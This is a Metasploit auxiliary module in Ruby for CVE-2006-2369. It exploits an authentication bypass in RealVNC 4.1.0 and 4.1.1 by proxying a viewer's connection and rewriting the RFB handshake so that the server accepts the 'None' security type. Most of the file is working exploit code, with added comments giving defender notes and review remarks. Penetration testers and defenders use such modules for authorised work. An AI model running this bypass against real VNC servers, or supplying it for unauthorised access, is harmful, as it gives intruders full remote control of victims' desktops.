Path: blob/master/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2006-2369 (RealVNC 4.1.0 / 4.1.1 per the description).
#
# The module does not talk RFB to the target on its own; it runs a small
# man-in-the-middle proxy: a viewer connects to LPORT on this host, the module
# connects to the target (RHOST/RPORT via the Tcp mixin), rewrites only the
# security-type negotiation of the RFB 3.8 handshake, and then relays bytes in
# both directions until either side closes.
#
# Defender notes (grounded in what this code does):
# * On the target, the artefact is an RFB 003.008 session in which the client
#   answers the server's security-type offer with type 1 (None) and the server
#   accepts it - the Notes block flags this as IOC_IN_LOGS.
# * Mitigation is to run a RealVNC release not affected by this bypass and to
#   keep the VNC port reachable only from trusted networks.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the three options used by #run:
  # RPORT (target VNC port), LPORT (local proxy port) and AUTOVNC
  # (spawn a local vncviewer against the proxy).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'RealVNC NULL Authentication Mode Bypass',
        'Description' => %q{
          This module exploits an Authentication bypass vulnerability
          in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
          listener on LPORT and proxies to the target server.

          The AUTOVNC option requires that vncviewer be installed on
          the attacking machine.
        },
        'Author' => [
          'hdm', # original msf2 module
          'theLightCosine'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['BID', '17978'],
          ['OSVDB', '25479'],
          ['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'],
          ['CVE', '2006-2369'],
        ],
        'DisclosureDate' => '2006-05-15',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The port the target VNC Server is listening on', 5900 ]),
        OptPort.new('LPORT', [true, 'The port the local VNC Proxy should listen on', 5900 ]),
        OptBool.new('AUTOVNC', [true, 'Automatically launch vncviewer from this host', false])
      ]
    )
  end

  # Entry point. Accepts exactly one viewer connection on LPORT, connects to the
  # target, rewrites the RFB security-type negotiation and then relays traffic
  # until one side disconnects.
  #
  # @return [nil] always; returns early (without raising) when AUTOVNC is set
  #   but no vncviewer binary is found, or when the target does not announce
  #   RFB 003.008.
  def run
    # starts up the Listener Server
    print_status('Starting listener...')
    # Binds every local interface. Nothing below checks who connected to
    # LPORT - whatever reaches it is relayed straight into the target - so the
    # proxy port should only be reachable by the intended viewer.
    listener = Rex::Socket::TcpServer.create(
      'LocalHost' => '0.0.0.0',
      'LocalPort' => datastore['LPORT'],
      'Context' => { 'Msf' => framework, 'MsfExploit' => self }
    )

    # If the autovnc option is set to true this will spawn a vncviewer on the local machine
    # targeting the proxy listener.
    if datastore['AUTOVNC']
      unless check_vncviewer
        print_error('The vncviewer does not appear to be installed, exiting...')
        # NOTE(review): the listener created above is not closed on this path.
        return nil
      end
      print_status('Spawning viewer thread...')
      # The viewer runs in a framework thread (non-critical, second arg false)
      # so that the accept() below can proceed. LPORT is interpolated into a
      # shell command; it is an OptPort, so the value is numeric.
      view = framework.threads.spawn('VncViewerWrapper', false) do
        system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
      end
    end

    # Establishes the connection between the viewier and the remote server
    # Blocks until one viewer connects; add_socket presumably registers the
    # socket with the module so the framework can clean it up later.
    client = listener.accept
    add_socket(client)

    # Closes the listener socket as it is no longer needed
    # (only a single viewer session is ever served per run).
    listener.close

    # Tcp mixin: connects to RHOST:RPORT.
    s = connect

    # RFB handshake step 1: the server announces its protocol version.
    # NOTE(review): get_once can return nil if the server closes without
    # sending anything, in which case include? raises NoMethodError. Also,
    # neither s nor client is closed on the early return below.
    serverhello = s.get_once
    unless serverhello.include? 'RFB 003.008'
      print_error('The server is not vulnerable')
      return
    end

    # MitM attack on the VNC Authentication Process
    # Version strings are relayed unchanged in both directions.
    client.puts(serverhello)
    clienthello = client.get_once
    s.puts(clienthello)

    # The server's own security-type offer (per RFB 3.8: a count byte followed
    # by the type bytes) is read and discarded rather than forwarded; only two
    # bytes are consumed here, so a server offering more than one type would
    # leave unread bytes on s - TODO confirm against the target's behaviour.
    s.read(2)

    print_status('Auth methods received. Sending null authentication option to client')
    # Tell the viewer the only available security type is 1 (None, per the
    # RFB 3.8 spec), then consume the viewer's one-byte choice.
    client.write("\x01\x01")
    client.read(1)
    # The bypass itself: the affected server accepts type 1 (None) even though
    # it did not offer it. Its 4-byte SecurityResult is read and dropped, and the
    # viewer is unconditionally told "OK" (0) regardless of what the server said.
    s.put("\x01")
    s.read(4)
    client.put("\x00\x00\x00\x00")

    # Handles remaining proxy operations between the two sockets
    # select() is called with a zero timeout, so this loop busy-polls;
    # `next if selected.nil?` just retries immediately.
    closed = false
    while (closed == false)
      sockets = []
      sockets << client
      sockets << s
      selected = select(sockets, nil, nil, 0)
      # print_status ("Selected: #{selected.inspect}")
      next if selected.nil?

      # Viewer -> server direction. A nil read or any StandardError is treated
      # as the viewer having gone away and ends the relay loop.
      if selected[0].include?(client)
        begin
          data = client.get_once
          if data.nil?
            print_error('Client closed connection')
            closed = true
          else
            s.put(data)
          end
        rescue StandardError
          print_error('Client closed connection')
          closed = true
        end
      end

      next unless selected[0].include?(s)

      # Server -> viewer direction; same handling, except the rescue branch
      # ends the loop silently (no message is printed).
      begin
        data = s.get_once
        if data.nil?
          print_error('Server closed connection')
          closed = true
        else
          client.put(data)
        end
      rescue StandardError
        closed = true
      end
    end

    # Close sockets
    s.close
    client.close

    # Tear down the viewer thread if one was spawned; errors from kill are
    # deliberately ignored (best effort cleanup).
    if datastore['AUTOVNC']
      begin
        view.kill
      rescue StandardError
        nil
      end
    end
  end

  # Looks for a vncviewer binary (Unix or Windows name) on this host's PATH.
  #
  # @return [Boolean] true when either name resolves to a full path.
  #   (Could be written as `!!vnc`; kept verbatim here.)
  def check_vncviewer
    vnc =
      Rex::FileUtils.find_full_path('vncviewer') ||
      Rex::FileUtils.find_full_path('vncviewer.exe')
    if vnc
      return true
    else
      return false
    end
  end
end